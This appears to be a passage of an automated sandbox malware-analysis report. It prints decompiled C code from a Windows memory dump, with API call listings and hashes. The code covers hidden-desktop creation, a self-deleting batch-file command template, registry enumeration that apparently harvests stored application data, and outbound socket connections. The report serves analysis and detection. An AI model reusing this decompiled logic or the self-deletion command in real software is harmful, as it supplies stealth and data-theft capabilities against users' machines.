    											_t258 = E00416F00(0x64,  &_v100,  *( *((intOrPtr*)(_t261 + 0x10)) + 0x100),  *( *((intOrPtr*)(_t261 + 0x10)) + 0x104));
    											if(_v108 + 0xfffffff6 <= 7) {
    												_t177 = GetWindowLongW(_t258, 0xfffffff0);
    												if((_t177 & 0x40000000) != 0 && (_t177 & 0x00c00000) != 0xc00000 && (_t177 & 0x80040000) == 0) {
    													_t178 = GetParent(_t258);
    													if(_t178 != 0) {
    														_t258 = _t178;
    													}
    												}
    											}
    											if(_t258 == 0) {
    												L47:
    												_t150 = _v96;
    												if(_t150 != 0) {
    													_t150 = IsWindow(_t150);
    													if(_t150 == 0 || _t258 != 0 && _v96 != _t258 && (_v92 & 0x00000007) == 0) {
    														if(_t195 != 0x8001) {
    															_t150 = E004272D0(0, _t261, 0, 0, 1);
    														}
    													} else {
    														_t258 = _v96;
    														_v100 = 1;
    													}
    												}
    												goto L55;
    											} else {
    												_t150 = E004260D0(_t258);
    												if((_t150 & 0x00000040) == 0) {
    													goto L47;
    												}
    												if(_t258 != _v96) {
    													_t150 = E004272D0(_t258, _t261, GetWindowThreadProcessId(_t258, 0), 0, 1);
    												}
    												_v100 = 1;
    												L55:
    												if(_t258 == 0) {
    													goto L90;
    												}
    												 *((intOrPtr*)(_t269 + 0x2c)) = 0x3c;
    												_t150 = GetWindowInfo(_t258, _t269 + 0x24);
    												if(_t150 == 0) {
    													goto L90;
    												}
    												_t150 = _a8 & 0x0000ffff;
    												_t199 = (_a12 & 0x0000ffff) << 0x00000010 | _t150;
    												_v96 = _t199;
    												if(_v100 != 1) {
    													_t199 = _v80;
    												} else {
    													_t150 = E004260D0(_t258);
    													if((_t150 & 0x00000020) == 0) {
    														_t150 = _a8 -  *((intOrPtr*)(_t269 + 0x38));
    														_t199 = (_a12 -  *((intOrPtr*)(_t269 + 0x3c)) & 0x0000ffff) << 0x00000010 | _t150 & 0x0000ffff;
    													}
    												}
    												if(_v88 == 0) {
    													if((_a4 & 0x00000004) == 0) {
    														goto L66;
    													}
    													_push(_v96);
    													_push(_t199);
    													_push(0xa2);
    													_push(_v100);
    													_t171 = 0x202;
    													goto L65;
    												} else {
    													_push(_v96);
    													_push(_t199);
    													_push(0xa1);
    													_push(_v100);
    													_t171 = 0x201;
    													L65:
    													_push(_t269 + 0x34);
    													_t150 = E004275A0(_t171, _t261);
    													L66:
    													if(_v84 == 0) {
    														if((_a4 & 0x00000040) == 0) {
    															L71:
    															if(_v80 == 0) {
    																if((_a4 & 0x00000010) == 0) {
    																	L76:
    																	if((_a4 & 0x00000001) != 0) {
    																		_t150 = E004275A0(0x200, _t261, _t269 + 0x34, _v100, 0xa0, _t199, _v96);
    																	}
    																	if((_a4 & 0x00000800) != 0) {
    																		_t263 =  *((intOrPtr*)(_t261 + 0x10));
    																		_t161 = 0;
    																		if(( *(_t263 + 1) & 0x00000080) != 0) {
    																			_t161 = 1;
    																		}
    																		if(( *(_t263 + 2) & 0x00000080) != 0) {
    																			_t161 = _t161 | 0x00000002;
    																		}
    																		if(( *(_t263 + 4) & 0x00000080) != 0) {
    																			_t161 = _t161 | 0x00000010;
    																		}
    																		if(( *(_t263 + 0x10) & 0x00000080) != 0) {
    																			_t161 = _t161 | 0x00000004;
    																		}
    																		if(( *(_t263 + 0x11) & 0x00000080) != 0) {
    																			_t161 = _t161 | 0x00000008;
    																		}
    																		_t150 = PostMessageW(_t258, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | _t161 & 0x0000ffff, _v96);
    																	}
    																	goto L90;
    																}
    																_push(_v96);
    																_push(_t199);
    																_push(0xa5);
    																_push(_v100);
    																_t165 = 0x205;
    																L75:
    																_push(_t269 + 0x34);
    																_t150 = E004275A0(_t165, _t261);
    																goto L76;
    															}
    															_push(_v96);
    															_push(_t199);
    															_push(0xa4);
    															_push(_v100);
    															_t165 = 0x204;
    															goto L75;
    														}
    														_push(_v96);
    														_push(_t199);
    														_push(0xa8);
    														_push(_v100);
    														_t168 = 0x208;
    														L70:
    														_push(_t269 + 0x34);
    														_t150 = E004275A0(_t168, _t261);
    														goto L71;
    													}
    													_push(_v96);
    													_push(_t199);
    													_push(0xa7);
    													_push(_v100);
    													_t168 = 0x207;
    													goto L70;
    												}
    											}
    										}
    										_t179 = 0;
    										L35:
    										E004265F0(_t179, _t261, 2);
    										goto L36;
    									}
    									_t179 = 1;
    									goto L35;
    								}
    								_t181 = 0;
    								L30:
    								E004265F0(_t181, _t261, 4);
    								goto L31;
    							}
    							_t181 = 1;
    							goto L30;
    						}
    						_t183 = 0;
    						_t252 = 1;
    						L25:
    						E004265F0(_t183, _t261, _t252);
    						goto L26;
    					}
    					_t183 = 1;
    					_t252 = 1;
    					goto L25;
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004278FA
    • ReleaseMutex.KERNEL32(?), ref: 00427928
    • IsWindow.USER32(?), ref: 0042792F
    • PostMessageW.USER32(?,00000215,00000000,00000000), ref: 00427943
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00427A43
    • GetParent.USER32(00000000), ref: 00427A68
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00427A8C
    • GetWindowInfo.USER32 ref: 00427B05
      • Part of subcall function 00427350: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,004278E5), ref: 00427363
      • Part of subcall function 00427350: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,004278E5), ref: 00427381
      • Part of subcall function 00427350: GetWindowRect.USER32 ref: 00427391
      • Part of subcall function 00427350: IsRectEmpty.USER32(?), ref: 00427414
      • Part of subcall function 00427350: GetWindowLongW.USER32(?,000000F0), ref: 00427425
      • Part of subcall function 00427350: GetParent.USER32(?), ref: 0042743A
      • Part of subcall function 00427350: MapWindowPoints.USER32 ref: 00427443
      • Part of subcall function 00427350: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C,?,?,?,?,?,?,?,004278E5), ref: 00427469
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$LongMutexObjectParentRectReleaseSingleWait$EmptyInfoMessagePointsPostProcessThread
    • String ID: <
    • API String ID: 4123185898-4251816714
    • Opcode ID: 742c429bee1dab4f2491ddd83dc28e33b8f6c1512944fe170b6816dec62195c3
    • Instruction ID: c03bbf8dba2acee17e1bd3899f2dbc880ef7be3be0d35897cbb258a25c6cef1b
    • Opcode Fuzzy Hash: 742c429bee1dab4f2491ddd83dc28e33b8f6c1512944fe170b6816dec62195c3
    • Instruction Fuzzy Hash: 8691C1B03083109BE724CF28E885B7B77E5AF85314F548A2EF89587391C778D845C76A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 43%
    			E00414D70(signed int __eax, void* __edx) {
    				void* __edi;
    				signed int _t24;
    				void* _t25;
    				void* _t35;
    				void* _t40;
    				void* _t50;
    				intOrPtr _t52;
    				intOrPtr _t53;
    				signed int _t54;
    				signed int _t55;
    				void* _t57;
    				void* _t58;
    
    				_t50 = 0;
    				asm("rol ax, 0x8");
    				_t24 = __eax & 0x0000ffff;
    				 *(_t58 + 0x20) = _t24;
    				_t57 = 0;
    				 *((intOrPtr*)(_t58 + 0x18)) = 0;
    				__imp__getaddrinfo(__edx, 0, 0, _t58 + 0xc);
    				if(_t24 == 0) {
    					_t40 =  *(_t58 + 0x10);
    					_push(_t54);
    					if(_t40 != 0) {
    						do {
    							_t24 =  *(_t40 + 4);
    							if(_t24 != 2) {
    								if(_t24 == 0x17) {
    									_t54 =  *(_t40 + 0x10);
    									_t53 =  *((intOrPtr*)(_t40 + 0x18));
    									if(_t54 != 0) {
    										_t24 = HeapAlloc( *0x42e6d4, 0, _t54 + 4);
    										if(_t24 != 0) {
    											_t24 = E00410820(_t24, _t53, _t54);
    										}
    									} else {
    										_t24 = 0;
    									}
    									 *(_t58 + 0x10) = _t24;
    								}
    							} else {
    								_t54 =  *(_t40 + 0x10);
    								_t52 =  *((intOrPtr*)(_t40 + 0x18));
    								if(_t54 != 0) {
    									_t24 = HeapAlloc( *0x42e6d4, 0, _t54 + 4);
    									if(_t24 != 0) {
    										_t24 = E00410820(_t24, _t52, _t54);
    									}
    									_t57 = _t24;
    								} else {
    									_t24 = 0;
    									_t57 = 0;
    								}
    							}
    							_t40 =  *(_t40 + 0x1c);
    						} while (_t40 != 0);
    						_t40 =  *(_t58 + 0x14);
    						_t50 =  *(_t58 + 0x10);
    					}
    					__imp__freeaddrinfo(_t40);
    					_t55 = _t54 | 0xffffffff;
    					if(_t57 != 0) {
    						 *((short*)(_t57 + 2)) =  *((intOrPtr*)(_t58 + 0x18));
    						__imp__#23( *_t57 & 0x0000ffff, 1, 6);
    						_t55 = _t24;
    						if(_t55 != 0xffffffff) {
    							_t35 = ((0 |  *_t57 != 0x00000002) - 0x00000001 & 0xfffffff4) + 0x1c;
    							__imp__#4(_t55, _t57, _t35);
    							if(_t35 != 0) {
    								__imp__#3(_t55);
    								_t55 = _t55 | 0xffffffff;
    							}
    						}
    					}
    					if(_t50 != 0 && _t55 == 0xffffffff) {
    						 *((short*)(_t50 + 2)) =  *((intOrPtr*)(_t58 + 0x18));
    						_t55 = E00414D20(_t50);
    					}
    					if(_t57 != 0) {
    						HeapFree( *0x42e6d4, 0, _t57);
    					}
    					_t25 =  *(_t58 + 0x10);
    					if(_t25 != 0) {
    						HeapFree( *0x42e6d4, 0, _t25);
    					}
    					return _t55;
    				} else {
    					return _t24 | 0xffffffff;
    				}
    			}

    APIs
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00414D90
    • freeaddrinfo.WS2_32(?,?), ref: 00414E31
    • socket.WS2_32(?,00000001,00000006), ref: 00414E50
    • connect.WS2_32(00000000,00000000,-0000001D), ref: 00414E71
    • closesocket.WS2_32(00000000), ref: 00414E7C
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 00414EB2
    • HeapFree.KERNEL32(?,00000000,?), ref: 00414EC5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap$closesocketconnectfreeaddrinfogetaddrinfosocket
    • String ID: p0u
    • API String ID: 2777671283-1742372003
    • Opcode ID: be89eeb97121b25d7678b7b4fc421a7b5dbd7d02bbd2fd6bd5b6837b118d9cbb
    • Instruction ID: 5a1f4fe44d53415d2eccfaf263b573818f3d3c5b3d59e2ed5ecb5855f9409c42
    • Opcode Fuzzy Hash: be89eeb97121b25d7678b7b4fc421a7b5dbd7d02bbd2fd6bd5b6837b118d9cbb
    • Instruction Fuzzy Hash: BB41E2716003116BCB20EF65AC84AAB77A8FBD4760F044A29FD55E7290E738D981C7E9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E004268C0(void* __eflags, intOrPtr _a4) {
    				char _v672;
    				char _v800;
    				char _v820;
    				char _v832;
    				intOrPtr _v848;
    				char _v1200;
    				char _v1304;
    				char _v1316;
    				char _v1336;
    				char _v1396;
    				char* _v1400;
    				intOrPtr _v1404;
    				void* _v1408;
    				void* _v1412;
    				intOrPtr _v1416;
    				intOrPtr _v1420;
    				char _v1424;
    				void* __esi;
    				signed int _t43;
    				signed int _t50;
    				signed int _t52;
    				signed int _t56;
    				signed int _t63;
    				signed int _t64;
    				void* _t82;
    				void* _t83;
    
    				_t83 = __eflags;
    				SetThreadPriority(GetCurrentThread(), 1);
    				E0041D150( &_v800);
    				E00416E10(0x42eb70,  &_v672,  *0x42e904,  &_v1304, 0);
    				if(E0041A370( &_v1316, _t83) == 0) {
    					L3:
    					return 0;
    				} else {
    					_t80 =  &_v1200;
    					_t43 = E00426210( &_v1200, 1);
    					if(_t43 != 0) {
    						__imp__GetShellWindow();
    						__eflags = _t43;
    						_t64 = _t63 & 0xffffff00 | _t43 != 0x00000000;
    						__eflags = _t64;
    						if(_t64 == 0) {
    							_t81 =  &_v1424;
    							_t50 = E00424100(0xa8,  &_v1424);
    							__imp__SHGetFolderPathW(0, 0x25, 0, 0,  &_v800);
    							__eflags = _t50;
    							if(_t50 == 0) {
    								_t52 = E004188B0(_t81,  &_v820,  &_v820);
    								__eflags = _t52;
    								if(_t52 != 0) {
    									_t78 =  &_v1396;
    									E00410870(_t52,  &_v1396, 0, 0x44);
    									_v1400 =  &_v1336;
    									_v1408 = 0x44;
    									_t56 = E00412BF0(0,  &_v832, 0, _t78,  &_v1424);
    									__eflags = _t56;
    									if(_t56 != 0) {
    										_t82 = _v1412;
    										WaitForSingleObject(_t82, 0x1388);
    										CloseHandle(_v1408);
    										CloseHandle(_t82);
    										_t64 = 1;
    									}
    								}
    							}
    						}
    						SystemParametersInfoW(0x1003, 0, 0, 0);
    						__eflags = _t64 - 1;
    						if(_t64 == 1) {
    							_push(_v848);
    							_v1424 =  &_v1200;
    							_push(_v1200);
    							_push( &_v1424);
    							_push(_a4);
    							_v1420 = 0x426800;
    							_v1416 = 0x426810;
    							_v1412 = E00426820;
    							_v1408 = E00426850;
    							_v1404 = E00426860;
    							_v1400 = E004268A0;
    							_v1396 = 0x426800;
    							E00406350();
    						}
    						E004264F0( &_v1200, 1);
    						return _t64;
    					} else {
    						E004264F0(_t80, 1);
    						goto L3;
    					}
    				}
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 004268CB
    • SetThreadPriority.KERNEL32(00000000), ref: 004268D2
      • Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6
      • Part of subcall function 0041A370: OpenWindowStationW.USER32 ref: 0041A393
      • Part of subcall function 0041A370: CreateWindowStationW.USER32 ref: 0041A3A9
      • Part of subcall function 0041A370: GetProcessWindowStation.USER32(?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A3B5
      • Part of subcall function 0041A370: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0041A3E7
      • Part of subcall function 0041A370: CreateDesktopW.USER32 ref: 0041A3FD
      • Part of subcall function 0041A370: CloseDesktop.USER32(00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A412
      • Part of subcall function 0041A370: CloseWindowStation.USER32(00000000,00000000,?,75315FF0,?,?,?,?,?,00426917,?,?,00000000), ref: 0041A42B
      • Part of subcall function 00426210: TlsAlloc.KERNEL32(0042EEA0,00000000,0000018C,00000000,77E49EB0,00000000), ref: 00426227
    • GetShellWindow.USER32 ref: 00426944
    • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00426975
    • WaitForSingleObject.KERNEL32(?,00001388), ref: 004269DA
    • CloseHandle.KERNEL32(?), ref: 004269EB
    • CloseHandle.KERNEL32(?), ref: 004269EE
    • SystemParametersInfoW.USER32 ref: 004269FD
      • Part of subcall function 004264F0: DeleteObject.GDI32(?), ref: 00426503
      • Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426513
      • Part of subcall function 004264F0: TlsFree.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 0042651E
      • Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 0042652C
      • Part of subcall function 004264F0: UnmapViewOfFile.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426536
      • Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426543
      • Part of subcall function 004264F0: SelectObject.GDI32(?,?), ref: 00426562
      • Part of subcall function 004264F0: DeleteObject.GDI32(?), ref: 00426573
      • Part of subcall function 004264F0: DeleteDC.GDI32(?), ref: 00426580
      • Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426591
      • Part of subcall function 004264F0: WaitForSingleObject.KERNEL32(?,00000000,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265A0
      • Part of subcall function 004264F0: PostThreadMessageW.USER32 ref: 004265BA
      • Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265D1
      • Part of subcall function 004264F0: CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265DA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Close$Handle$ObjectWindow$Station$DeleteDesktopThread$CreateOpenSingleWait$AllocCurrentFileFolderFreeFromInfoMessageParametersPathPostPriorityProcessSelectShellStringSystemUnmapView
    • String ID: D$pB
    • API String ID: 2998749583-3244306929
    • Opcode ID: 20da6ed3f8bafa0548b7b7867449c2d421620ef50f1a5a76dd23c4af9ad01b9c
    • Instruction ID: a5a4172f029ea8df0589d0bbb2d35d018abd928581834061967204759e9073cf
    • Opcode Fuzzy Hash: 20da6ed3f8bafa0548b7b7867449c2d421620ef50f1a5a76dd23c4af9ad01b9c
    • Instruction Fuzzy Hash: 1041E971345350ABD320EB51DD45FDB77E4ABC4704F80482EFA8497190DBB898498BAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00412E80() {
    				intOrPtr _v0;
    				char _v548;
    				char _v812;
    				char _v1328;
    				short _v1332;
    				char _v1344;
    				short _v1368;
    				intOrPtr _v1372;
    				char _v1404;
    				void* _v1408;
    				intOrPtr _v1416;
    				void* __edi;
    				void* __esi;
    				void* _t19;
    				long _t31;
    				void* _t39;
    				WCHAR* _t50;
    				void* _t51;
    
    				_push(L"bat");
    				_t50 =  &_v1328;
    				_t19 = E004181D0(_t50);
    				_t56 = _t19;
    				if(_t19 == 0) {
    					L9:
    					__eflags = 0;
    					return 0;
    				} else {
    					CharToOemW(_t50,  &_v812);
    					_push( &_v812);
    					if(E00411E70(_t56,  &_v1408, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _v0) == 0xffffffff) {
    						L8:
    						SetFileAttributesW( &_v1332, 0x80);
    						DeleteFileW( &_v1332);
    						goto L9;
    					} else {
    						_t51 = _v1408;
    						_t39 = E00417FC0(_t50, _t51, _t24);
    						if(_t51 != 0) {
    							HeapFree( *0x42e6d4, 0, _t51);
    						}
    						if(_t39 == 0) {
    							goto L8;
    						} else {
    							_push( &_v1332);
    							if(E00411D10( &_v1332, 0x10e,  &_v548, L"/c \"%s\"") <= 0xffffffff) {
    								goto L8;
    							} else {
    								_t31 = GetEnvironmentVariableW(L"ComSpec",  &_v1332, 0x104);
    								_t32 = _t31 - 1;
    								if(_t31 - 1 > 0x102) {
    									goto L8;
    								} else {
    									E00410870(_t32,  &_v1404, 0, 0x44);
    									_v1368 = 0;
    									_v1416 = 0x44;
    									_v1372 = 1;
    									return E00412BF0( &_v548,  &_v1344, 0,  &_v1404, 0) & 0xffffff00 | _t36 != 0x00000000;
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 004181D0: GetTempPathW.KERNEL32(000000F6,?,?,?,00000000), ref: 004181E6
      • Part of subcall function 004181D0: GetTickCount.KERNEL32 ref: 00418200
      • Part of subcall function 004181D0: PathCombineW.SHLWAPI(?,?,?,?,?,?,00000000), ref: 00418264
      • Part of subcall function 004181D0: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00418281
    • CharToOemW.USER32 ref: 00412EAA
      • Part of subcall function 00411E70: HeapFree.KERNEL32(?,00000000,?,?,?,00000000,00000000,?,004078E8,?), ref: 00411EA6
    • HeapFree.KERNEL32(?,00000000,?,?,00000000), ref: 00412EF6
    • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,00000000), ref: 00412F36
    • SetFileAttributesW.KERNEL32(?,00000080), ref: 00412F94
    • DeleteFileW.KERNEL32(?), ref: 00412F9F
      • Part of subcall function 00417FC0: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,00000000,00412EE6,?,00000000), ref: 00417FDC
      • Part of subcall function 00417FC0: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00412EE6,?,00000000), ref: 00417FFF
      • Part of subcall function 00417FC0: CloseHandle.KERNEL32(00000000,?,00000000,00412EE6,?,00000000), ref: 0041800C
      • Part of subcall function 00417FC0: SetFileAttributesW.KERNEL32(?,00000080,?,00000000,00412EE6,?,00000000), ref: 0041801D
      • Part of subcall function 00417FC0: DeleteFileW.KERNEL32(?,?,00000000,00412EE6,?,00000000), ref: 00418024
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: File$AttributesCreateDeleteFreeHeapPath$CharCloseCombineCountEnvironmentHandleTempTickVariableWrite
    • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$D$bat
    • API String ID: 1930972344-2561832857
    • Opcode ID: 11cac2dc6d8ef78dc0dcbaf9d574d644f00f92f47b57800527b2c6b5c6b9a140
    • Instruction ID: 3369c501f2fe7777fcb9f45d1885ab026239c0684d40059ea28482de71ec20c1
    • Opcode Fuzzy Hash: 11cac2dc6d8ef78dc0dcbaf9d574d644f00f92f47b57800527b2c6b5c6b9a140
    • Instruction Fuzzy Hash: CE21F8716043016BD320DB65DD45FEBB7A8EFC4311F00492EF644D7190D6B8994A9BAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00421C30() {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t67;
    				signed int _t89;
    				signed int _t94;
    				signed int _t96;
    				void* _t97;
    				void* _t100;
    				void* _t101;
    				char* _t108;
    				char* _t144;
    				void* _t145;
    				intOrPtr _t147;
    				signed int _t152;
    				int _t154;
    				signed int _t155;
    				signed int _t156;
    				void* _t159;
    				void* _t160;
    				void* _t161;
    
    				_t67 = HeapAlloc( *0x42e6d4, 8, 0xc0c);
    				_t159 = _t67;
    				 *(_t161 + 0x1c) = _t159;
    				if(_t159 == 0) {
    					L29:
    					return _t67;
    				} else {
    					E00424100(0x83, _t161 + 0xa8);
    					_t147 = _t161 + 0xe8;
    					E00424100(0x84, _t147);
    					 *((intOrPtr*)(_t161 + 0x44)) = _t161 + 0xb0;
    					 *((intOrPtr*)(_t161 + 0x48)) = _t147;
    					E00410870(_t161 + 0x2c, _t161 + 0x2c, 0, 8);
    					E00424100(0x85, _t161 + 0x4c);
    					E00424100(0x86, _t161 + 0x60);
    					E00424100(0x87, _t161 + 0x40);
    					E00424100(0x88, _t161 + 0x74);
    					_t160 = _t159 + 0x1fe;
    					_t12 = _t160 + 0x1fe; // 0x1fe
    					_t144 = _t12;
    					_t152 = 0;
    					_t13 =  &(_t144[0x1fe]); // 0x3fc
    					_t108 = _t13;
    					 *(_t161 + 0x2c) = 0;
    					do {
    						if(RegOpenKeyExW(0x80000001,  *(_t161 + 0x38 + _t152 * 4), 0, 8, _t161 + 0x18) == 0) {
    							_t154 = 0;
    							 *(_t161 + 0x34) = 0x104;
    							if(RegEnumKeyExW( *(_t161 + 0x18), 0, _t161 + 0x13c, _t161 + 0x24, 0, 0, 0, 0) == 0) {
    								do {
    									_t155 = _t154 + 1;
    									 *(_t161 + 0x40) = _t155;
    									_t89 = E00416420( *(_t161 + 0x20), _t161 + 0x130, _t161 + 0x50, 0xff);
    									 *(_t161 + 0x14) = _t89;
    									if(_t89 != 0xffffffff && _t89 != 0) {
    										_t94 = E00416420( *(_t161 + 0x24), _t161 + 0x130, _t161 + 0x64, 0xff);
    										 *(_t161 + 0x14) = _t94;
    										if(_t94 == 0xffffffff || _t94 == 0) {
    											_t96 = E00416420( *(_t161 + 0x18), _t161 + 0x130, _t161 + 0x44, 0xff);
    											 *(_t161 + 0x14) = _t96;
    											if(_t96 != 0xffffffff && _t96 != 0) {
    												goto L11;
    											}
    										} else {
    											L11:
    											_t97 =  *(_t161 + 0x18);
    											 *((intOrPtr*)(_t161 + 0x44)) = 0xff;
    											 *(_t161 + 0x34) = _t97;
    											_t156 = _t155 | 0xffffffff;
    											if(RegOpenKeyExW(_t97, _t161 + 0x134, 0, 1, _t161 + 0x20) == 0) {
    												RegQueryValueExW( *(_t161 + 0x20), _t161 + 0x84, 0, 0, _t144, _t161 + 0x30);
    												_t156 =  ==  ?  *(_t161 + 0x30) : _t156;
    												RegCloseKey( *(_t161 + 0x20));
    											}
    											 *(_t161 + 0x14) = _t156;
    											if(_t156 != 0xffffffff && _t156 != 0 && E00421BD0(_t144) > 0) {
    												_t100 = E00424100(0x56, _t161 + 0x88);
    												_push( *(_t161 + 0x1c));
    												_push(_t144);
    												_push(_t160);
    												_t101 = E00411D10(_t100, 0x307, _t108, _t161 + 0x88);
    												_t161 = _t161 + 0x10;
    												if(_t101 > 0 && E00410D70(_t161 + 0x28, _t108, _t101) != 0) {
    													 *((intOrPtr*)(_t161 + 0x28)) =  *((intOrPtr*)(_t161 + 0x28)) + 1;
    												}
    											}
    										}
    									}
    									_t154 =  *(_t161 + 0x34);
    									 *(_t161 + 0x34) = 0x104;
    								} while (RegEnumKeyExW( *(_t161 + 0x18), _t154, _t161 + 0x13c, _t161 + 0x24, 0, 0, 0, 0) == 0);
    							}
    							RegCloseKey( *(_t161 + 0x18));
    							_t152 =  *(_t161 + 0x2c);
    						}
    						_t152 = _t152 + 1;
    						 *(_t161 + 0x2c) = _t152;
    					} while (_t152 < 2);
    					_t67 = HeapFree( *0x42e6d4, 0,  *(_t161 + 0x1c));
    					if( *((intOrPtr*)(_t161 + 0x28)) <= 0) {
    						_t67 =  *(_t161 + 0x24);
    						if(_t67 != 0) {
    							return HeapFree( *0x42e6d4, 0, _t67);
    						}
    						goto L29;
    					} else {
    						_t145 =  *(_t161 + 0x24);
    						if(_t145 == 0) {
    							goto L29;
    						} else {
    							if( *_t145 != 0) {
    								E00424100(0x89, _t161 + 0x330);
    								E0040D880(_t145, 0xcb, _t161 + 0x330);
    							}
    							return HeapFree( *0x42e6d4, 0, _t145);
    						}
    					}
    				}
    			}

    APIs
    • HeapAlloc.KERNEL32(?,00000008,00000C0C,?,00000000), ref: 00421C47
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,00000000,?,00000000,00000008,?,00000000), ref: 00421CFF
    • RegEnumKeyExW.ADVAPI32 ref: 00421D2E
    • RegEnumKeyExW.ADVAPI32(00000000,00000104,?,?,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00421EB0
      • Part of subcall function 00416420: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004164DB
      • Part of subcall function 00416420: HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 004164F5
    • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000001,00000000,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 00421DFA
    • RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000000,000001FE,?), ref: 00421E1B
    • RegCloseKey.ADVAPI32(00000000), ref: 00421E2D
    • RegCloseKey.ADVAPI32(00000000), ref: 00421EC3
    • HeapFree.KERNEL32(?,00000000,?,?,00000000), ref: 00421EEF
    • HeapFree.KERNEL32(?,00000000,?), ref: 00421F30
    • HeapFree.KERNEL32(?,00000000,?), ref: 00421F4F
      • Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
      • Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
      • Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$CloseOpen$EnumQueryValue$AllocEnvironmentExpandStrings
    • String ID:
    • API String ID: 4155870178-0
    • Opcode ID: a71da2171ce97ae4f57e3157b7c8c0564d31bb7d8a1366b636c910df6c6e70ae
